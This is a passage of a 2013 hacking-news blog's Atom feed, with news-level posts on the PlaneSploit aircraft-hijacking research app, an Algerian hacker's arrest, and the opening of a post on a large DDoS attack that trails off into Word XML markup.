&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=HdikN8zO988:HYfS_Ig6NBA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=HdikN8zO988:HYfS_Ig6NBA:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=HdikN8zO988:HYfS_Ig6NBA:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=HdikN8zO988:HYfS_Ig6NBA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/HdikN8zO988" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/9086851159865661986/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/won-network-designing-competition-procom.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9086851159865661986?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9086851159865661986?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/HdikN8zO988/won-network-designing-competition-procom.html" title="Won Network Designing Competition At PROCOM 2013" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-bk1Bcvbe8Xo/UWxnHuGeP8I/AAAAAAAACwk/Ve0uP17Irf8/s72-c/544372_206051142873964_1748635807_n-620x315.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/won-network-designing-competition-procom.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEEFQX07fip7ImA9WhBVEE0.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8892554275046395732</id><published>2013-04-14T23:16:00.004-07:00</published><updated>2013-04-14T23:16:50.306-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-14T23:16:50.306-07:00</app:edited><title>Hijacking An Aircraft With An Android App</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-5Lq277wUwhc/UWspMxwG9WI/AAAAAAAAAA4/6gCinRDlNWI/s1600/planesploit_android_app_to_hijack_airplanes_by_hugo_teso.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-5Lq277wUwhc/UWspMxwG9WI/AAAAAAAAAA4/6gCinRDlNWI/s1600/planesploit_android_app_to_hijack_airplanes_by_hugo_teso.jpg" width="230" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Well vulnerabilities that never going to end, or should we say vulnerabilities and new inventions walk side by side.&lt;br /&gt;
Recently a terrifying prospect, a hack that allows an attacker to take control of plane navigation and cockpit systems has been revealed at a security conference in Europe. An Android application called PlaneSploit that would allow remotely attack and hijack commercial aircraft. This app is developed by Hugo Teso, a researcher at security consultancy N.Runs in Germany who's also a commercial airline pilot.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
He further added,"He explained that by building an exploit framework called Simon and a complimentary Android app that delivers attack messages, he could manipulate a plane's path as he saw fit." &lt;br /&gt;
With these vulnerabilities in mind, he used virtual planes in a lab to demonstrate his ability to hijack a plane rather than attempting to take over a real flight as that was “too dangerous and unethical.” He used ACARS to gain access to the plane’s onboard computer system and uploaded Flight Management System data.&lt;br /&gt;
&lt;br /&gt;
"I expected them to have security issues but I did not expect them to be so easy to spot. I thought I would have to fight hard to get into them but it was not that difficult," Teso said.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ic4YyuLcZg0:gIP88dQxgWw:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ic4YyuLcZg0:gIP88dQxgWw:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ic4YyuLcZg0:gIP88dQxgWw:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ic4YyuLcZg0:gIP88dQxgWw:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/ic4YyuLcZg0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8892554275046395732/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/hijacking-aircraft-with-android-app.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8892554275046395732?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8892554275046395732?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/ic4YyuLcZg0/hijacking-aircraft-with-android-app.html" title="Hijacking An Aircraft With An Android App" /><author><name>FaHaD aWaN</name><uri>http://www.blogger.com/profile/11388036707127075893</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-5Lq277wUwhc/UWspMxwG9WI/AAAAAAAAAA4/6gCinRDlNWI/s72-c/planesploit_android_app_to_hijack_airplanes_by_hugo_teso.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/hijacking-aircraft-with-android-app.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkQHRXY9fyp7ImA9WhBWFUk.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8141988278918301637</id><published>2013-04-09T14:52:00.000-07:00</published><updated>2013-04-09T14:52:14.867-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-09T14:52:14.867-07:00</app:edited><title>Zeus Master turned down Israel</title><content type="html">&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-LV6u9JUbGzE/UWSINFHh5WI/AAAAAAAAAAo/HiVWwjEawHQ/s1600/Algerian080113.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-LV6u9JUbGzE/UWSINFHh5WI/AAAAAAAAAAo/HiVWwjEawHQ/s1600/Algerian080113.jpg" height="182" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Recently worldwide Hackers started #OpIsrael and targeted Israeli websites, which caused massive disruption to government, academic and private sites. According to the news/Media Israel asked Algerian Hamza the happiest hacker&amp;nbsp; to intervene to save Israel fro&lt;span style="font-size: small;"&gt;m &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;the heavy losses in exchange for his release, but he refused to help them.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Hamza &lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;who hacked sensitive sites in the U.S. and then arrested
 by Interpol, US authorities accuse him of hacking into private accounts
 in more than 217 banks and financial companies worldwide, causing 
millions of dollars in losses. H&lt;span style="font-size: small;"&gt;e &lt;span style="font-size: small;"&gt;was arrested in T&lt;span style="font-size: small;"&gt;hailand when &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;he was traveling with his family following a holiday in Malaysia &lt;b&gt;en route&lt;/b&gt; to Cairo, Egypt.&lt;br /&gt;
&lt;br /&gt;
"The arrest warrant specifically &lt;b&gt;mentioned &lt;/b&gt;that &lt;b&gt;bail&lt;/b&gt; is not allowed.'' The court said. &lt;br /&gt;
&lt;h4&gt;
About the author &lt;/h4&gt;
This article has been written by Fahad Awan, He is the newest author on RHA team.&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=St-ylsbeSQk:E51GVmjh62c:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=St-ylsbeSQk:E51GVmjh62c:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=St-ylsbeSQk:E51GVmjh62c:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=St-ylsbeSQk:E51GVmjh62c:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/St-ylsbeSQk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8141988278918301637/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/zeus-master-turned-down-israel.html#comment-form" title="5 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8141988278918301637?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8141988278918301637?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/St-ylsbeSQk/zeus-master-turned-down-israel.html" title="Zeus Master turned down Israel" /><author><name>FaHaD aWaN</name><uri>http://www.blogger.com/profile/11388036707127075893</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-LV6u9JUbGzE/UWSINFHh5WI/AAAAAAAAAAo/HiVWwjEawHQ/s72-c/Algerian080113.jpg" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/zeus-master-turned-down-israel.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0cGRn0_eCp7ImA9WhBWEEU.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4189183736098328426</id><published>2013-04-04T07:17:00.000-07:00</published><updated>2013-04-04T07:17:07.340-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-04T07:17:07.340-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Website hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="Webserver Security" /><title>Anotomy of The Largest DDOS Attack That Almost Took Down The Internet</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-EoTGr7UZIRE/UV2LI4obmFI/AAAAAAAACwQ/zof98ZK7Jto/s1600/DOS.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="246" src="http://4.bp.blogspot.com/-EoTGr7UZIRE/UV2LI4obmFI/AAAAAAAACwQ/zof98ZK7Jto/s320/DOS.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:DontVertAlignCellWithSp/&gt;
   &lt;w:DontBreakConstrainedForcedTables/&gt;
   &lt;w:DontVertAlignInTxbx/&gt;
   &lt;w:Word11KerningPairs/&gt;
   &lt;w:CachedColBalance/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val="Cambria Math"/&gt;
   &lt;m:brkBin m:val="before"/&gt;
   &lt;m:brkBinSub m:val="&amp;#45;-"/&gt;
   &lt;m:smallFrac m:val="off"/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val="0"/&gt;
   &lt;m:rMargin m:val="0"/&gt;
   &lt;m:defJc m:val="centerGroup"/&gt;
   &lt;m:wrapIndent m:val="1440"/&gt;
   &lt;m:intLim m:val="subSup"/&gt;
   &lt;m:naryLim m:val="undOvr"/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
  LatentStyleCount="267"&gt;
  &lt;w:LsdException Locked="false" Priority="0" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Normal"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/&gt;
  &lt;w:LsdException Locked="false" Priority="10" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/&gt;
  &lt;w:LsdException Locked="false" Priority="11" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/&gt;
  &lt;w:LsdException Locked="false" Priority="22" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Strong"/&gt;
  &lt;w:LsdException Locked="false" Priority="20" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="59" SemiHidden="false"
   UnhideWhenUsed="false" Name="Table Grid"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/&gt;
  &lt;w:LsdException Locked="false" Priority="34" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/&gt;
  &lt;w:LsdException Locked="false" Priority="29" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="30" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
